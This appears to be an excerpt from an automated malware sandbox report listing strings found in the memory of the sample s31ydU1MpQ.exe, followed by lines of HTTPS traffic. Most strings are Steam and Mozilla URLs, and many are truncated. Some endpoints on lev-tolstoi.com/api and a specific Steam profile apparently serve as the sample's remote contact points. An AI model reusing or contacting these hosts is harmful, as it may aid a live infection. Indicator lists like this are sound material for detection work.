Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: s31ydU1MpQ.exe, 00000000.00000003.1342694795.000000000597C000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1342694795.000000000597C000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: s31ydU1MpQ.exe, 00000000.00000003.1342694795.000000000597C000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.stRG
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: s31ydU1MpQ.exe, 00000000.00000003.1436249870.000000000595B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1389314349.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/4
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/=
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1318672251.0000000001297000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341921354.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415661013.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480098661.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1436434228.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415661013.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480772440.0000000005937000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341740721.0000000001297000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1391239937.0000000005930000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005940000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415818290.00000000012B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: s31ydU1MpQ.exe, 00000000.00000003.1436434228.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apia
Source: s31ydU1MpQ.exe, 00000000.00000003.1341921354.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apim
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apin
Source: s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apis
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.0000000001282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi0Q
Source: s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/sw
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/api
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apiglbfimdfabpdfjaoolaf
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apiocal
Source: s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apissio
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296626489.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queni
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaizedrG/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/p
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.0000000001282000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.0000000001297000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.0000000001282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/xPD
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptc
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
